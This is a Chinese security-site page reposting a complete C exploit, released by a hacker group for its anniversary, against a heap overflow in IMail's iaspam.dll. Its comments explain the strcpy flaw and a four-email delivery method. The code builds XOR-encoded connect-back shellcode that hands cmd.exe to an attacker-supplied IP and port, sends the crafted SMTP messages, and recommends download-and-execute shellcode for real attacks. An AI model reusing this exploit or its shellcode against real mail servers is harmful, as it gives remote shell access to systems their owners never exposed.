首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IMail iaspam.dll 8.0x Remote Heap Overflow Exploit 来源：http://www.ph4nt0m.org 作者：axis 发布时间：2007-09-21   Author: axis Date: 2007-09-20 Team: http://www.ph4nt0m.org 为了庆祝幻影成立6周年(6th Anniversary)，老规矩，发点贺礼出来。 今年写的一个exp，送给过一些朋友，这次把source code直接公布出来。 这个漏洞也没啥，但是利用方式还不错，可以给大家借鉴下。 请仔细阅读我的注释，要是溢出不成功别找我。ScriptKids are not welcome. /* by axis 2007-06-05 http://www.ph4nt0m.org 以前有这个一个imail的exp PRIVATE Remote Exploit For IMAIL Smtp Server(1.2) This is For imail 8.01-8.11 version Usage:faint.exe -d <host> [options] Options: -d: Hostname to attack [Required] -t: Type [Default: 0] -p: Attack port [Default: 25] -S: the IP connect back to. -P: the port connect back to. Types: 0: win2k All version , IMail 8.01-11 不知道是哪位大牛写的 最近看了看， 非常好玩的一个漏洞。 漏洞是发生在iaspam.dll里 loc_1001ada5 ==> 注意动态调试时候注意加载基址的不同。 mov eax, [ebp+var_54] mov ecx, [eax+10c8h] push ecx ; char * mov edx, [ebp+var_54] mov eax, [edx+10d0h] push eax ; char * call _strcpy add esp, 8 jmp loc_1001a6f0 这里strcpy的两个buffer，src和dst的指针，居然是直接从堆里读出来的。 而之前没有做任何检查 所以发送个邮件到服务器，SMD文件 然后在其后的偏移处控制这两个地址，就可以拷贝任意字符串到任意内存。 badchar是 0x00 0x0a emm说还有个 0x25,不过我没找到。 以前网上那个反连的版本，是利用了覆盖peb里的指针。 这种方法在2003上不能用。 这里我采用了emm的方法，构造了一个溢出 因为imailsec.dll的.data段可写。 所以我找到了这么一个地方 1000CB5D 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 1000CB60 50 PUSH EAX 1000CB61 8B0D 6C540310 MOV ECX,DWORD PTR DS:[1003546C] ; IMailsec.1003549C 1000CB67 51 PUSH ECX 1000CB68 8D95 FCFDFFFF LEA EDX,DWORD PTR SS:[EBP-204] 1000CB6E 52 PUSH EDX 1000CB6F FF15 F8D30210 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; USER32.wsprintfA 其中指针DWORD PTR DS:[1003546C] 在imailsec.dll的.data中，这个地址可以被我 们覆盖。 所以我们就可以构造一个溢出。 思路如下： 第一封邮件： 发送shellcode到内存中保存好。这里我放到了teb中 第二封邮件： 发送溢出需要的覆盖字符串到内存中保存好。这里我也放在了teb中 第三封邮件： 覆盖imailsec.dll中的 .data段的指针，使wsprintfA造成溢出 溢出覆盖使用的字符串是第二封邮件发送过去的，覆盖后的返回地址直接指向了第一 封邮件发送过去的shellcode在内存中的地址。 所以这个漏洞是和平台无关的！！不需要任何opcode！！ 在实际利用时我发送了4封邮件，第一封是废邮件，用于提高成功率。 由于互联网的spam泛滥，所以等到邮件服务器处理漏洞邮件时，也许已经过了几个月 了。。。 所以最好的方案是使用download+exec 的shellcode。 这里给出一个比较烂的反连shellcode作为poc。 据emm说这个漏洞一直没补，只是高版本没有了。。。 */ #include <stdio.h> #include <stdlib.h> #include <windows.h> #include <winsock.h> #include <io.h> #pragma comment (lib,"ws2_32") char *szEHLO = "HELO\r\n"; char *szMF = "MAIL FROM <fuc...@fuckimail.org>\r\n"; char *szRCPT = "RCPT TO: <postmaster>\r\n"; char *szDATA = "DATA\r\n"; char *szTIME = "Date: Thu, 1 Oct 2007 07:06:09 +0800\r\n"; char *szMIME = "MIME\r\n"; char *szEND = ".\r\n"; char *szQUIT = "QUIT\r\n"; char *szCT = "Content-Type: multipart/boundary="; char *szCTE = "Content-Transfer-Encoding:"; //#define SCaddr "\x50\xe7\x03\x10" #define SCaddr "\x50\xc8\xfd\x7f" #define Fuck_ptr "\x6c\x54\x03\x10" //0x1003546c #define Teb_temp1 0x7ffdd050 #define Teb_temp2 0x7ffdd040 #define Teb_temp3 0x7ffdd030 unsigned short port = 25; unsigned char payload[5000] = ""; #define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 #define PROC_END PROC_BEGIN unsigned char sh_Buff[2048]; unsigned int sh_Len; unsigned int Enc_key=0x99; //其实无关紧要,动态寻找 unsigned char decode1[] = /* 00401004 . /EB 0E JMP SHORT encode.00401014 00401006 $ |5B POP EBX 00401007 . |4B DEC EBX 00401008 . |33C9 XOR ECX,ECX 0040100A . |B1 FF MOV CL,0FF 0040100C > |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99 00401010 .^|E2 FA LOOPD SHORT encode.0040100C 00401012 . |EB 05 JMP SHORT encode.00401019 00401014 > \E8 EDFFFFFF CALL encode.00401006 */ "\xEB\x0E\x5B\x4B\x33\xC9\xB1" "\xFF" // shellcode size "\x80\x34\x0B" "\xB8" // xor byte "\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF"; unsigned char decode2[] = /* 00406030 /EB 10 JMP SHORT 00406042 00406032 |5B POP EBX 00406033 |4B DEC EBX 00406034 |33C9 XOR ECX,ECX 00406036 |66:B9 6601 MOV CX,166 0040603A |80340B 99 XOR BYTE PTR DS:[EBX+ECX],99 0040603E ^|E2 FA LOOPD SHORT 0040603A 00406040 |EB 05 JMP SHORT 00406047 00406042 \E8 EBFFFFFF CALL 00406032 */ "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9" "\x66\x01" // shellcode size "\x80\x34\x0B" "\xB8" // xor byte "\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"; // kernel32.dll functions index #define _LoadLibraryA 0x00 #define _CreateProcessA 0x04 //#define _ExitProcess 0x08 #define _ExitThread 0x08 #define _WaitForSingleObject 0x0C // ws2_32.dll functions index #define _WSASocketA 0x10 #define _connect 0x14 #define _closesocket 0x18 //#define _WSAStartup 0x1C // functions number #define _Knums 4 #define _Wnums 3 // Need functions unsigned char functions[100][128] = { // [esi] stack layout // kernel32 4 // 00 kernel32.dll {"LoadLibraryA"}, // [esi] {"CreateProcessA"}, // [esi+4] {"ExitThread"}, // [esi+8] //{"ExitProcess"}, //{"TerminateProcess"}, {"WaitForSingleObject"}, // [esi+12] // ws2_32 3 // 01 ws2_32.dll {"WSASocketA"}, // [esi+16] {"connect"}, // [esi+20] {"closesocket"}, // [esi+24] //{"WSAStartup"}, // [esi+28] {""}, }; void PrintSc(unsigned char *lpBuff, int buffsize); void ShellCode(); // Get function hash unsigned long hash(unsigned char *c) { unsigned long h=0; while(*c) { h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++; } return h; } // get shellcode void GetShellCode(char* ipstr, short port) { char *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; unsigned char *pSc_addr; unsigned char pSc_Buff[2048]; unsigned int MAX_Sc_Len=0x2000; unsigned long dwHash[100]; unsigned int dwHashSize; unsigned int l,i,j,k; char *p; int ip; // Get functions hash for (i=0;;i++) { if (functions[i][0] == '\x0') break; dwHash[i] = hash(functions[i]); //fprintf(stderr, "%.8X\t%s\n", dwHash[i], functions[i]); } dwHashSize = i*4; // Deal with shellcode pSc_addr = (unsigned char *)ShellCode; for (k=0;k<MAX_Sc_Len;++k ) { if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) { break; } } pSc_addr+=(k+8); // start of the ShellCode for (k=0;k<MAX_Sc_Len;++k) { if(memcmp(pSc_addr+k,fnend_str, 8)==0) { break; } } sh_Len=k; // length of the ShellCode memcpy(pSc_Buff, pSc_addr, sh_Len); for(k=0; k<sh_Len; ++k) { if(memcmp(pSc_Buff+k, "\x68\x7F\x00\x00\x01", 5) == 0) { ip = inet_addr(ipstr); p = (char*)&ip; pSc_Buff[k+1] = p[0]; pSc_Buff[k+2] = p[1]; pSc_Buff[k+3] = p[2]; pSc_Buff[k+4] = p[3]; } if(memcmp(pSc_Buff+k, "\x68\x02\x00\x00\x35", 5) == 0) { p = (char*)&port; pSc_Buff[k+3] = p[1]; pSc_Buff[k+4] = p[0]; } } // Add functions hash memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize); sh_Len += dwHashSize; //printf("%d bytes shellcode\n", sh_Len); // print shellcode //PrintSc(pSc_Buff, sh_Len); // find xor byte for(i=0xff; i>0; i--) { l = 0; for(j=0; j<sh_Len; j++) { if ( // ((pSc_Buff[j] ^ i) == 0x26) || //% // ((pSc_Buff[j] ^ i) == 0x3d) || //= // ((pSc_Buff[j] ^ i) == 0x3f) || //? //((pSc_Buff[j] ^ i) == 0x40) || //@ ((pSc_Buff[j] ^ i) == 0x00) || //((pSc_Buff[j] ^ i) == 0x3c) || //((pSc_Buff[j] ^ i) == 0x3e) || // ((pSc_Buff[j] ^ i) == 0x2f) || // ((pSc_Buff[j] ^ i) == 0x22) || // ((pSc_Buff[j] ^ i) == 0x2a) || //((pSc_Buff[j] ^ i) == 0x3a) || // ((pSc_Buff[j] ^ i) == 0x20) || ((pSc_Buff[j] ^ i) == 0x25) || ((pSc_Buff[j] ^ i) == 0x0D) || ((pSc_Buff[j] ^ i) == 0x0A) // ((pSc_Buff[j] ^ i) == 0x5C) ) { l++; break; }; } if (l==0) { Enc_key = i; //printf("Find XOR Byte: 0x%02X\n", i); for(j=0; j<sh_Len; j++) { pSc_Buff[j] ^= Enc_key; } break; // break when found xor byte } } // No xor byte found if (l!=0){ //fprintf(stderr, "No xor byte found!\n"); sh_Len = 0; } else { //fprintf(stderr, "Xor byte 0x%02X\n", Enc_key); // encode if (sh_Len > 0xFF) { *(unsigned short *)&decode2[8] = sh_Len; *(unsigned char *)&decode2[13] = Enc_key; memcpy(sh_Buff, decode2, sizeof(decode2)-1); memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len); sh_Len += sizeof(decode2)-1; } else { *(unsigned char *)&decode1[7] = sh_Len; *(unsigned char *)&decode1[11] = Enc_key; memcpy(sh_Buff, decode1, sizeof(decode1)-1); memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len); sh_Len += sizeof(decode1)-1; } } } // print shellcode void PrintSc(unsigned char *lpBuff, int buffsize) { int i,j; char *p; char msg[4]; printf("/* %d bytes */\n",buffsize); for(i=0;i<buffsize;i++) { if((i%16)==0) if(i!=0) printf("\"\n\""); else printf("\""); sprintf(msg,"\\x%.2X",lpBuff[i]&0xff); for( p = msg, j=0; j < 4; p++, j++ ) { if(isupper(*p)) printf("%c", _tolower(*p)); else printf("%c", p[0]); } } printf( "\";\n"); } // ShellCode function void ShellCode() { __asm { PROC_BEGIN // C macro to begin proc jmp sc_end sc_start: pop edi // Hash string start addr (esp -> edi) // Get kernel32.dll base addr mov eax, fs:0x30 // PEB mov eax, [eax+0x0c] // PROCESS_MODULE_INFO mov esi, [eax+0x1c] // InInitOrder.flink lodsd // eax = InInitOrder.blink mov ebp, [eax+8] // ebp = kernel32.dll base address mov esi, edi // Hash string start addr -> esi // Get function addr of kernel32 push _Knums pop ecx get_kernel32: call GetProcAddress_fun loop get_kernel32 // Get ws2_32.dll base addr push 0x00003233 push 0x5f327377 push esp call dword ptr [esi+_LoadLibraryA] // LoadLibraryA("ws2_32"); //mov ebp, eax // ebp = ws2_32.dll base address xchg eax, ebp // Get function addr of ws2_32 push _Wnums pop ecx get_ws2_32: call GetProcAddress_fun loop get_ws2_32 // /* //LWSAStartup: sub esp, 400 push esp push 0x101 call dword ptr [esi+_WSAStartup] // WSAStartup(0x101, &WSADATA); // */ //LWSASocketA: push ecx push ecx push ecx push ecx push 1 push 2 call dword ptr [esi+_WSASocketA] // s=WSASocketA(2,1,0,0,0,0); //mov ebx, eax // socket -> ebx xchg eax, ebx //Lconnect: //int 3 push 0x0100007F // host: 127.0.0.1 push 0x35000002 // port: 53 mov ebp, esp push 0x10 // sizeof(sockaddr_in) push ebp // sockaddr_in address push ebx // socket s call dword ptr [esi+_connect] // connect(s, name, sizeof(name)); // if connect failed , exit test eax, eax jne Finished // xor eax, eax // allot memory for STARTUPINFO, PROCESS_INFORMATION mov edi, esp // zero out SI/PI push 0x12 pop ecx stack_zero: stosd loop stack_zero //mov byte ptr [esp+0x10], 0x44 // si.cb = sizeof(si) //inc byte ptr [esp+0x3C] // si.dwFlags //inc byte ptr [esp+0x3D] // si.wShowWindow //mov [esp+0x48], ebx // si.hStdInput = s //mov [esp+0x4C], ebx // si.hStdOutput = s //mov [esp+0x50], ebx // si.hStdError = s mov word ptr [esp+0x3c], 0x0101 xchg eax, ebx stosd stosd stosd mov edi, esp // push "cmd" push 0x00646d63 // "cmd" mov ebp, esp push eax // socket //LCreateProcess: lea eax, [edi+0x10] push edi // pi push eax // si push ecx // lpCurrentDirectory push ecx // lpEnvironment push ecx // dwCreationFlags push 1 // bInheritHandles push ecx // lpThreadAttributes push ecx // lpProcessAttributes push ebp // lpCommandLine = "cmd" push ecx // lpApplicationName NULL call dword ptr [esi+_CreateProcessA] // CreactProcessA(NULL,"CMD",0,0,1,0,0,0,si, pi); //LWaitForSingleObject: //push 1 push 0xFFFFFFFF push dword ptr [edi] call dword ptr [esi+_WaitForSingleObject] // WaitForSingleObject(Handle, time) ; //LCloseSocket: //push ebx call dword ptr [esi+_closesocket] // closesocket(c); Finished: // 恢复构造的溢出点 mov eax, 0x1003546c mov DWORD ptr [eax], 0x1003549c mov DWORD ptr [eax+4], 0x100354c8 mov DWORD ptr [eax+8], 0x100354e0 //push 1 //call dword ptr [esi+_ExitProcess] // ExitProcess(); xor eax, eax push eax call dword ptr [esi+_ExitThread] // GetProcAddress_fun: push ecx push esi mov esi, [ebp+0x3C] // e_lfanew mov esi, [esi+ebp+0x78] // ExportDirectory RVA add esi, ebp // rva2va push esi mov esi, [esi+0x20] // AddressOfNames RVA add esi, ebp // rva2va xor ecx, ecx dec ecx find_start: inc ecx lodsd add eax, ebp xor ebx, ebx hash_loop: movsx edx, byte ptr [eax] cmp dl, dh jz short find_addr ror ebx, 7 // hash key add ebx, edx inc eax jmp short hash_loop find_addr: cmp ebx, [edi] // compare to hash jnz short find_start pop esi // ExportDirectory // AddressOfNameOrdinals RVA /* //-------------------------------------------------------- jmp over_it __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 //-------------------------------------------------------- over_it: */ mov ebx, [esi+0x24] add ebx, ebp // rva2va mov cx, [ebx+ecx*2] // FunctionOrdinal mov ebx, [esi+0x1C] // AddressOfFunctions RVA add ebx, ebp // rva2va mov eax, [ebx+ecx*4] // FunctionAddress RVA add eax, ebp // rva2va stosd // function address save to [edi] pop esi pop ecx ret sc_end: call sc_start PROC_END //C macro to end proc } } // ripped from isno int Make_Connection(char *address,int port,int timeout) { struct sockaddr_in target; SOCKET s; int i; DWORD bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr==0) { closesocket(s); return -2; } target.sin_port = htons((short)port); bf = 1; ioctlsocket(s,FIONBIO,&bf); tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { closesocket(s); return -3; } if(i==0) { closesocket(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i); if((bf!=0)||(i!=sizeof(int))) { closesocket(s); return -5; } ioctlsocket(s,FIONBIO,&bf); return s; } void Disconnect(SOCKET s) { closesocket(s); WSACleanup(); } void help(char *n) { printf("==Usage:\n"); printf("%s [target ip] [target port] [local ip] [local port]\n\n", n); printf("We will send 4 mail to trigger the vuln.\n"); printf("The fucking vuln will be triggered when the mail server handling the mail.\n"); printf("Because of the Spam in the internet,\nthe vuln maybe triggered after a few days!!Fuck!!\n\n"); } int sendfuckingmail(int the_mail, char *target, int tg_port) { SOCKET s; WSADATA WSAData; char buffer[1000] = {0}; // 临时buffer用于io int ret; char padding[5000] = {0}; // padding用于填充 if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { fprintf(stderr, "[-] WSAStartup failed.\n"); WSACleanup(); exit(1); } s = Make_Connection(target, tg_port, 10); if(s<0) { fprintf(stderr, "[-] connect err.\n"); exit(1); } recv(s, buffer, sizeof(buffer), 0); Sleep(1000); ret = strlen(buffer); if ( ret < 10 ) { printf("[-]Seems Service Down~ :( \n"); Disconnect(s); return -1; } printf("[+]Got Banner: %s", buffer); // HELO send(s, szEHLO, strlen(szEHLO), 0); recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); printf("[+]Say hello to Server.\n"); memset(buffer, 0, sizeof(buffer)); // MAIL FROM Sleep(500); send(s, szMF, strlen(szMF), 0); recv(s, buffer, sizeof(buffer), 0); if(strstr(buffer, "250")) printf("[+]Recv: %s", buffer); else { printf("[-]Seems Service Down~ :( \n"); Disconnect(s); return -1; } memset(buffer, 0, sizeof(buffer)); // RCPT TO Sleep(500); send(s, szRCPT, strlen(szRCPT), 0); recv(s, buffer, sizeof(buffer), 0); if(strstr(buffer, "250")) printf("[+]Recv: %s", buffer); else { printf("[-]Seems Service Down~ :( \n"); Disconnect(s); return -1; } memset(buffer, 0, sizeof(buffer)); // DATA Sleep(500); send(s, szDATA, strlen(szDATA), 0); recv(s, buffer, sizeof(buffer), 0); if(strstr(buffer, "354")) printf("[+]Recv: %s", buffer); else { printf("[-]Seems Service Down~ :( \n"); Disconnect(s); return -1; } memset(buffer, 0, sizeof(buffer)); Sleep(100); // TIME send(s, szTIME, strlen(szTIME), 0); // recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); printf("[+]Fucking Server at %s", szTIME); memset(buffer, 0, sizeof(buffer)); Sleep(200); // 判断是第几封邮件 if (the_mail == 0) // 发一封废邮件，提高成功率 { /* my $padding = "\x22"."B"x2028; my $padding1 = "B"x2046; my $padding11 = "B"x146; #163个B my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # 在teb 中 my $straddr2 = "\x50\xc0\xfd\x7f"; # shellcode会拷贝到的地址 print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n"; */ memcpy(payload, szCT, strlen((const char *)szCT)); //memcpy(payload+strlen(const char *szCT), "\"", 1); memset(padding, 0x43, 5000); padding[0] = '\x22'; padding[2029] = '\x20'; padding[4076] = '\x20'; //straddr1 padding[4223] = '\x50'; padding[4224] = '\xd0'; padding[4225] = '\xfd'; padding[4226] = '\x7f'; padding[4227] = '\x30'; padding[4228] = '\xd0'; padding[4229] = '\xfd'; padding[4230] = '\x7f'; //straddr2 0x10036ea0 padding[4231] = '\x30'; padding[4232] = '\xd8'; padding[4233] = '\xfd'; padding[4234] = '\x7f'; padding[4235] = '\x0d'; padding[4236] = '\x0a'; padding[4237] = '\x00'; memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding)); send(s, (const char *)payload, strlen((const char *)payload), 0); Sleep(100); // MIME send(s, (const char *)szMIME, strlen((const char *)szMIME), 0); // recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); // printf("[+]Fucking Server at %s.\n", szTIME); // memset(buffer, 0, sizeof(buffer)); //print $sock "Content-Transfer-Encoding:$padding2\r\n"; memset(padding, 0x43, 80); //memcpy(padding, "\x43", 80); padding[80] = '\x00'; memset(payload, 0x00, sizeof(payload)); memcpy(payload, szCTE, strlen((const char*)szCTE)); memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding)); memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2); Sleep(200); send(s, (const char *)payload, strlen((const char *)payload), 0); memset(payload, 0x00, sizeof(payload)); } else if (the_mail == 1) // 构造bufferoverflow的覆盖字符串 { /* my $padding = "\x22"."B"x2028; my $padding1 = "B"x2046; my $padding11 = "B"x146; #163个B my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # 在teb 中 my $straddr2 = "\x50\xc0\xfd\x7f"; # shellcode会拷贝到的地址 print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n"; */ memcpy(payload, szCT, strlen((const char *)szCT)); //memcpy(payload+strlen(const char *szCT), "\"", 1); memset(padding, 0x43, 5000); padding[0] = '\x22'; padding[2029] = '\x20'; padding[4076] = '\x20'; //straddr1 padding[4223] = '\x50'; padding[4224] = '\xd0'; padding[4225] = '\xfd'; padding[4226] = '\x7f'; padding[4227] = '\x30'; padding[4228] = '\xd0'; padding[4229] = '\xfd'; padding[4230] = '\x7f'; //straddr2 0x10036ea0 padding[4231] = '\x50'; padding[4232] = '\xc0'; padding[4233] = '\xfd'; padding[4234] = '\x7f'; padding[4235] = '\x0d'; padding[4236] = '\x0a'; padding[4237] = '\x00'; memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding)); send(s, (const char *)payload, strlen((const char *)payload), 0); Sleep(100); // MIME send(s, (const char *)szMIME, strlen((const char *)szMIME), 0); // recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); // printf("[+]Fucking Server at %s.\n", szTIME); // memset(buffer, 0, sizeof(buffer)); //print $sock "Content-Transfer-Encoding:$padding2\r\n"; memset(padding, 0x43, 80); //memcpy(padding, "\x43", 80); padding[80] = '\x00'; memset(payload, 0x00, sizeof(payload)); memcpy(payload, szCTE, strlen((const char*)szCTE)); memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding)); memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2); Sleep(200); send(s, (const char *)payload, strlen((const char *)payload), 0); // send payload 构造溢出的字符串 eip指向shellcode的地址 memset(payload, 0x00, sizeof(payload)); memset(payload, 0x44, 520); memcpy(payload+520, SCaddr, strlen((const char *)SCaddr)); memcpy(payload+520+4, "\r\n", 2); Sleep(200); send(s, (const char *)payload, strlen((const char *)payload), 0); memset(payload, 0x00, sizeof(payload)); } else if (the_mail == 2) // 发送shellcode { /* my $padding = "\x22"."B"x2028; my $padding1 = "B"x2046; my $padding11 = "B"x146; #163个B my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # 在teb 中 my $straddr2 = "\x50\xe7\x03\x10"; # shellcode会拷贝到的地址 print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n"; */ memcpy(payload, szCT, strlen((const char *)szCT)); //memcpy(payload+strlen(const char *szCT), "\"", 1); memset(padding, 0x43, 5000); padding[0] = '\x22'; padding[2029] = '\x20'; padding[4076] = '\x20'; //straddr1 padding[4223] = '\x50'; padding[4224] = '\xd0'; padding[4225] = '\xfd'; padding[4226] = '\x7f'; padding[4227] = '\x30'; padding[4228] = '\xd0'; padding[4229] = '\xfd'; padding[4230] = '\x7f'; //straddr2 0x7ffdc850 padding[4231] = '\x50'; padding[4232] = '\xc8'; padding[4233] = '\xfd'; padding[4234] = '\x7f'; padding[4235] = '\x0d'; padding[4236] = '\x0a'; padding[4237] = '\x00'; memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding)); send(s, (const char *)payload, strlen((const char *)payload), 0); // MIME send(s, (const char *)szMIME, strlen((const char *)szMIME), 0); // recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); // printf("[+]Fucking Server at %s.\n", szTIME); // memset(buffer, 0, sizeof(buffer)); //print $sock "Content-Transfer-Encoding:$padding2\r\n"; memset(padding, 0x43, 80); //memcpy(padding, "\x43", 80); padding[80] = '\x00'; memset(payload, 0x00, sizeof(payload)); memcpy(payload, szCTE, strlen((const char*)szCTE)); memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding)); memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2); send(s, (const char *)payload, strlen((const char *)payload), 0); Sleep(200); // 发送shellcode过去保存 memset(payload, 0x00, sizeof(payload)); memcpy(payload, sh_Buff, strlen((const char*)sh_Buff)); memcpy(payload+strlen((const char*)sh_Buff), "\r\n", 2); send(s, (const char *)payload, strlen((const char *)payload), 0); memset(payload, 0x00, sizeof(payload)); } else // 第三封邮件，构造溢出 { Sleep(500); // 因为要触发漏洞了，所以必须要晚点，不然 shellcode没到位 /* my $padding = "\x22"."B"x2028; my $padding1 = "B"x2046; my $padding11 = "B"x146; #163个B my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # 在teb 中 my $straddr2 = "\x6c\x54\x03\x10"; # shellcode会拷贝到的地址 print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n"; */ memcpy(payload, szCT, strlen((const char *)szCT)); //memcpy(payload+strlen(const char *szCT), "\"", 1); memset(padding, 0x43, 5000); padding[0] = '\x22'; padding[2029] = '\x20'; padding[4076] = '\x20'; //straddr1 padding[4223] = '\x50'; padding[4224] = '\xd0'; padding[4225] = '\xfd'; padding[4226] = '\x7f'; padding[4227] = '\x30'; padding[4228] = '\xd0'; padding[4229] = '\xfd'; padding[4230] = '\x7f'; //straddr2 触发溢出的地址 padding[4231] = '\x6c'; padding[4232] = '\x54'; padding[4233] = '\x03'; padding[4234] = '\x10'; padding[4235] = '\x0d'; padding[4236] = '\x0a'; padding[4237] = '\x00'; memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding)); send(s, (const char *)payload, strlen((const char *)payload), 0); // MIME send(s, (const char *)szMIME, strlen((const char *)szMIME), 0); // recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); // printf("[+]Fucking Server at %s.\n", szTIME); // memset(buffer, 0, sizeof(buffer)); //print $sock "Content-Transfer-Encoding:$padding2\r\n"; memset(padding, 0x43, 80); //memcpy(padding, "\x43", 80); padding[80] = '\x00'; memset(payload, 0x00, sizeof(payload)); memcpy(payload, szCTE, strlen((const char*)szCTE)); memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding)); memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2); send(s, (const char *)payload, strlen((const char *)payload), 0); Sleep(200); // send payload 修改指针地址，构造出溢出 memset(payload, 0x00, sizeof(payload)); // 需要指向构造溢出字符串的地址，以及2个可写地址 memcpy(payload, "\x50\xc0\xfd\x7f", 4); memcpy(payload+4, "\x40\xc0\xfd\x7f\x30\xc0\xfd\x7f", 8); memcpy(payload+12, "\r\n", 2); send(s, (const char *)payload, strlen((const char *)payload), 0); memset(payload, 0x00, sizeof(payload)); } // END Sleep(500); send(s, szEND, strlen(szEND), 0); recv(s, buffer, sizeof(buffer), 0); if(strstr(buffer, "250")) printf("[+]Recv: %s", buffer); else { printf("[-]Seems Service Down~ :( \n"); Disconnect(s); return -1; } memset(buffer, 0, sizeof(buffer)); // QUIT send(s, szQUIT, strlen(szQUIT), 0); recv(s, buffer, sizeof(buffer), 0); // printf("%s", buffer); printf("[+]Fucking END, Ejaculating Now !\n\n"); memset(buffer, 0, sizeof(buffer)); Sleep(400); closesocket(s); WSACleanup(); return 0; } int main(int argc, char *argv[]) { //int imail_ver = 0; //imail version (buffer不同) //int ret; //SOCKET s; //WSADATA WSAData; printf("\n== IMail iaspam.dll 8.01-8.11 Private Remote Exploit\n"); printf("== by axis@ph4nt0m\n"); printf("== http://www.ph4nt0m.org\n"); printf("== 2007-06\n"); printf("== 2007-09-18 published as a gift for the 6th Anniversary of Ph4nt0m\n"); printf("== ConnBack Version\n"); printf("== Thanks EnvyMask@ph4nt0m\n\n"); if(argc != 5) { help(argv[0]); return 0; } if(argc == 5) port = atoi(argv[4]); GetShellCode(argv[3], port); if (!sh_Len) { printf("[-] Shellcode generate error.\n"); exit(1); } //printf("shellcode length is: %d \n",strlen((char *)sh_Buff)); //PrintSc(sh_Buff, sh_Len); Sleep(200); for (int mail_payload = 0; mail_payload <= 3; mail_payload++) { //printf("[+]Now Sending the %d fucking Mail!\n",mail_payload+1); sendfuckingmail(mail_payload, argv[1], atoi(argv[2])); Sleep(2000); } printf("Got a Shell on your port ?! @_@\n\n"); return 1; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Flip <= 3.0 Remote Password Ha ·Lighttpd <= 1.4.17 FastCGI Hea ·Flip <= 3.0 Remoe Admin Creati ·EasyMail MessagePrinter Object ·OneCMS 2.4 (userreviews.php ab ·Xitami Web Server 2.5 (If-Modi ·Sun jre1.6.0_X isInstalled.dns ·AskJeeves Toolbar 4.0.2.53 act ·Microsoft Visual Basic Enterpr ·EB Design Pty Ltd (EBCRYPT.DLL ·>Mercury/32 4.52 IMAPD SEARCH ·Motorola Timbuktu Pro 8.6.3 Ar   推荐广告

